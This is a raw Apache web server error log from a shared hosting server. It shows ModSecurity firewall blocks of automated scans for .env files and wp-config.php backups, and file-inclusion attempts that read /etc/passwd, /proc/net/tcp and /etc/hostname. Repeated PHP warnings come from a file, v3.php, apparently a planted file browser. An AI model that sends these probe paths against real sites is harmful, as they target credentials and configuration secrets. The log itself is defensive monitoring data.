[Mon May 11 15:58:06.692665 2026] [security2:error] [pid 1319998:tid 1320000] [client 176.65.139.168:53078] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.env.local"] [unique_id "agHgbqt2WtvoFr7xvGzfuAAAAIA"]
[Mon May 11 15:58:06.692905 2026] [security2:error] [pid 1319998:tid 1320000] [client 176.65.139.168:53078] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.env.local"] [unique_id "agHgbqt2WtvoFr7xvGzfuAAAAIA"]
[Mon May 11 15:58:06.693137 2026] [security2:error] [pid 1319998:tid 1320000] [client 176.65.139.168:53078] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.env.local"] [unique_id "agHgbqt2WtvoFr7xvGzfuAAAAIA"]
[Mon May 11 15:58:13.791619 2026] [security2:error] [pid 1320674:tid 1320698] [client 45.8.255.141:30417] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHgdaO9RdIr1DwxYR2eSwAAAMg"], referer: https://www.piregwan-genesis.com/
[Mon May 11 15:59:25.067274 2026] [ssl:error] [pid 1319953:tid 1319964] [client 46.101.9.216:52156] AH02032: Hostname tonyangraceboutique.com provided via SNI and hostname www.tchatbooster.com provided via HTTP have no compatible SSL setup for policy 'secure'
[Mon May 11 15:59:25.515244 2026] [ssl:error] [pid 1319885:tid 1319889] [client 46.101.9.216:52354] AH02032: Hostname www.hotvor.net provided via SNI and hostname www.tchatbooster.com provided via HTTP have no compatible SSL setup for policy 'secure'
[Mon May 11 15:59:41.779660 2026] [security2:error] [pid 1319953:tid 1319977] [client 146.56.199.139:53372] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.of-crystal-lake.net"] [uri "/"] [unique_id "agHgy-SQ-m-m0ukSShuNlQAAAVY"]
[Mon May 11 15:59:41.779666 2026] [security2:error] [pid 1319886:tid 1319923] [client 216.73.216.110:63962] ModSecurity: Warning. Matched phrase "proc/net/tcp" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: proc/net/tcp found within ARGS:filesrc: /proc/net/tcp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agHgzay-5-wpj6Sx56aleQAAAA8"]
[Mon May 11 15:59:41.780365 2026] [security2:error] [pid 1319886:tid 1319923] [client 216.73.216.110:63962] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agHgzay-5-wpj6Sx56aleQAAAA8"]
[Mon May 11 15:59:41.872382 2026] [security2:error] [pid 1319886:tid 1319923] [client 216.73.216.110:63962] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agHgzay-5-wpj6Sx56aleQAAAA8"]
PHP Warning:  filesize(): stat failed for /proc/1704738/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704738/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704738/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704738/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704738/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704738/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 16:00:43.716998 2026] [authz_core:error] [pid 1319886:tid 1319936] [client 216.73.216.110:29603] AH01630: client denied by server configuration: /home/missmand/public_html/missmandarine.ch/learning/old/main/coursecopy/classes/error_log
[Mon May 11 16:01:19.704641 2026] [security2:error] [pid 1319953:tid 1319970] [client 216.73.216.110:43026] ModSecurity: Warning. Matched phrase "etc/passwd" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/passwd found within ARGS:filesrc: /etc/passwd.cache"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agHhL-SQ-m-m0ukSShuOKgAAAU8"]
[Mon May 11 16:01:19.707230 2026] [security2:error] [pid 1319953:tid 1319970] [client 216.73.216.110:43026] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agHhL-SQ-m-m0ukSShuOKgAAAU8"]
[Mon May 11 16:01:19.799719 2026] [security2:error] [pid 1319953:tid 1319970] [client 216.73.216.110:43026] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agHhL-SQ-m-m0ukSShuOKgAAAU8"]
[Mon May 11 16:01:41.221316 2026] [authz_core:error] [pid 1320674:tid 1320690] [client 176.120.22.46:56757] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/error_log, referer: https://krakoukas.com/wp-includes/
[Mon May 11 16:01:47.973991 2026] [authz_core:error] [pid 1319885:tid 1319900] [client 176.120.22.46:62023] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/ID3/error_log, referer: https://krakoukas.com/wp-includes/ID3/
[Mon May 11 16:01:49.680556 2026] [security2:error] [pid 1319953:tid 1319969] [client 170.106.152.218:51736] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "labaujue.com"] [uri "/"] [unique_id "agHhTeSQ-m-m0ukSShuOWgAAAU4"]
[Mon May 11 16:01:54.347174 2026] [authz_core:error] [pid 1319886:tid 1319897] [client 176.120.22.46:50796] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/IXR/error_log, referer: https://krakoukas.com/wp-includes/IXR/
[Mon May 11 16:01:58.027594 2026] [security2:error] [pid 1319886:tid 1319928] [client 170.106.152.218:60434] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/"] [unique_id "agHhVqy-5-wpj6Sx56amMQAAABI"], referer: http://labaujue.com
[Mon May 11 16:02:00.769577 2026] [authz_core:error] [pid 1319885:tid 1319895] [client 176.120.22.46:56064] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/PHPMailer/error_log, referer: https://krakoukas.com/wp-includes/PHPMailer/
[Mon May 11 16:02:07.165723 2026] [authz_core:error] [pid 1320398:tid 1320419] [client 176.120.22.46:60802] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/Requests/error_log, referer: https://krakoukas.com/wp-includes/Requests/
[Mon May 11 16:02:13.537625 2026] [authz_core:error] [pid 1320398:tid 1320413] [client 176.120.22.46:49712] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/Requests/library/error_log, referer: https://krakoukas.com/wp-includes/Requests/library/
[Mon May 11 16:02:19.895078 2026] [authz_core:error] [pid 1320674:tid 1320692] [client 176.120.22.46:54928] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/Requests/src/error_log, referer: https://krakoukas.com/wp-includes/Requests/src/
[Mon May 11 16:02:26.330089 2026] [authz_core:error] [pid 1319953:tid 1319979] [client 176.120.22.46:60055] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/Requests/src/Auth/error_log, referer: https://krakoukas.com/wp-includes/Requests/src/Auth/
PHP Warning:  filesize(): stat failed for /proc/1704391/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704391/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704391/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704391/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704391/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704391/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 16:02:39.147082 2026] [authz_core:error] [pid 1319885:tid 1319900] [client 176.120.22.46:54321] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/Requests/src/Exception/error_log, referer: https://krakoukas.com/wp-includes/Requests/src/Exception/
PHP Warning:  filesize(): stat failed for /proc/1704659/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704659/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704659/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 16:02:45.509446 2026] [authz_core:error] [pid 1319886:tid 1319926] [client 176.120.22.46:59942] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/Requests/src/Proxy/error_log, referer: https://krakoukas.com/wp-includes/Requests/src/Proxy/
[Mon May 11 16:02:51.951482 2026] [authz_core:error] [pid 1319885:tid 1319910] [client 176.120.22.46:49304] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/Requests/src/Response/error_log, referer: https://krakoukas.com/wp-includes/Requests/src/Response/
[Mon May 11 16:02:58.321350 2026] [authz_core:error] [pid 1319885:tid 1319892] [client 176.120.22.46:55234] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/Requests/src/Transport/error_log, referer: https://krakoukas.com/wp-includes/Requests/src/Transport/
[Mon May 11 16:03:01.463238 2026] [authz_core:error] [pid 1319953:tid 1319976] [client 47.128.28.140:20456] AH01630: client denied by server configuration: /home/tchatboo/public_html/wp-includes/sodium_compat/namespaced/error_log
[Mon May 11 16:03:11.092214 2026] [authz_core:error] [pid 1319998:tid 1320000] [client 176.120.22.46:53138] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/SimplePie/error_log, referer: https://krakoukas.com/wp-includes/SimplePie/
[Mon May 11 16:03:17.737029 2026] [authz_core:error] [pid 1319953:tid 1319969] [client 176.120.22.46:59755] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/SimplePie/library/error_log, referer: https://krakoukas.com/wp-includes/SimplePie/library/
[Mon May 11 16:03:20.378956 2026] [ssl:error] [pid 1320398:tid 1320412] (EAI 2)Name or service not known: [client 92.184.140.213:50488] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 16:03:20.379224 2026] [ssl:error] [pid 1320398:tid 1320412] AH01941: stapling_renew_response: responder error
[Mon May 11 16:03:24.117666 2026] [authz_core:error] [pid 1320674:tid 1320703] [client 176.120.22.46:49905] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/SimplePie/library/SimplePie/error_log, referer: https://krakoukas.com/wp-includes/SimplePie/library/SimplePie/
[Mon May 11 16:03:30.537879 2026] [authz_core:error] [pid 1319998:tid 1320016] [client 176.120.22.46:56269] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/SimplePie/src/error_log, referer: https://krakoukas.com/wp-includes/SimplePie/src/
[Mon May 11 16:03:36.904411 2026] [authz_core:error] [pid 1319953:tid 1319962] [client 176.120.22.46:62218] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/SimplePie/src/Cache/error_log, referer: https://krakoukas.com/wp-includes/SimplePie/src/Cache/
[Mon May 11 16:03:40.080339 2026] [security2:error] [pid 1319953:tid 1319966] [client 172.212.217.10:41245] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "culturesvoile.com"] [uri "/wp-config.php.backup"] [unique_id "agHhvOSQ-m-m0ukSShuO4gAAAUs"]
[Mon May 11 16:03:40.081419 2026] [security2:error] [pid 1319953:tid 1319966] [client 172.212.217.10:41245] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "culturesvoile.com"] [uri "/wp-config.php.backup"] [unique_id "agHhvOSQ-m-m0ukSShuO4gAAAUs"]
[Mon May 11 16:03:40.084786 2026] [security2:error] [pid 1319953:tid 1319966] [client 172.212.217.10:41245] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "culturesvoile.com"] [uri "/wp-config.php.backup"] [unique_id "agHhvOSQ-m-m0ukSShuO4gAAAUs"]
[Mon May 11 16:03:40.392302 2026] [security2:error] [pid 1319886:tid 1319929] [client 176.65.139.168:35832] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "domaine-de-janasse.com"] [uri "/.env.local"] [unique_id "agHhvKy-5-wpj6Sx56anCgAAABM"]
[Mon May 11 16:03:40.392490 2026] [security2:error] [pid 1319886:tid 1319929] [client 176.65.139.168:35832] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "domaine-de-janasse.com"] [uri "/.env.local"] [unique_id "agHhvKy-5-wpj6Sx56anCgAAABM"]
[Mon May 11 16:03:40.393166 2026] [security2:error] [pid 1319886:tid 1319929] [client 176.65.139.168:35832] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "domaine-de-janasse.com"] [uri "/.env.local"] [unique_id "agHhvKy-5-wpj6Sx56anCgAAABM"]
[Mon May 11 16:03:46.406710 2026] [security2:error] [pid 1319953:tid 1319966] [client 172.212.217.10:41245] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /backup.wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "culturesvoile.com"] [uri "/backup.wp-config.php"] [unique_id "agHhwuSQ-m-m0ukSShuO9gAAAUs"]
[Mon May 11 16:03:46.406869 2026] [security2:error] [pid 1319953:tid 1319966] [client 172.212.217.10:41245] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "culturesvoile.com"] [uri "/backup.wp-config.php"] [unique_id "agHhwuSQ-m-m0ukSShuO9gAAAUs"]
[Mon May 11 16:03:46.407113 2026] [security2:error] [pid 1319953:tid 1319966] [client 172.212.217.10:41245] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "culturesvoile.com"] [uri "/backup.wp-config.php"] [unique_id "agHhwuSQ-m-m0ukSShuO9gAAAUs"]
[Mon May 11 16:03:50.081398 2026] [authz_core:error] [pid 1319885:tid 1319895] [client 176.120.22.46:57780] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/SimplePie/src/HTTP/error_log, referer: https://krakoukas.com/wp-includes/SimplePie/src/HTTP/
[Mon May 11 16:03:51.032696 2026] [security2:error] [pid 1319886:tid 1319931] [client 216.73.216.110:7832] ModSecurity: Warning. Matched phrase "etc/hostname" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/hostname found within ARGS:filesrc: /etc/hostname"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agHhx6y-5-wpj6Sx56anEgAAABQ"]
[Mon May 11 16:03:51.033331 2026] [security2:error] [pid 1319886:tid 1319931] [client 216.73.216.110:7832] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agHhx6y-5-wpj6Sx56anEgAAABQ"]
[Mon May 11 16:03:51.124539 2026] [security2:error] [pid 1319886:tid 1319931] [client 216.73.216.110:7832] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agHhx6y-5-wpj6Sx56anEgAAABQ"]
[Mon May 11 16:03:51.967192 2026] [:error] [pid 1319953:tid 1319966] [client 172.212.217.10:41245] File does not exist: /home/cultures/public_html/pi.php7
[Mon May 11 16:03:52.750764 2026] [security2:error] [pid 1319953:tid 1319966] [client 172.212.217.10:41245] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /new-wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "culturesvoile.com"] [uri "/new-wp-config.php"] [unique_id "agHhyOSQ-m-m0ukSShuPGwAAAUs"]
[Mon May 11 16:03:52.750921 2026] [security2:error] [pid 1319953:tid 1319966] [client 172.212.217.10:41245] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "culturesvoile.com"] [uri "/new-wp-config.php"] [unique_id "agHhyOSQ-m-m0ukSShuPGwAAAUs"]
[Mon May 11 16:03:52.751195 2026] [security2:error] [pid 1319953:tid 1319966] [client 172.212.217.10:41245] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "culturesvoile.com"] [uri "/new-wp-config.php"] [unique_id "agHhyOSQ-m-m0ukSShuPGwAAAUs"]
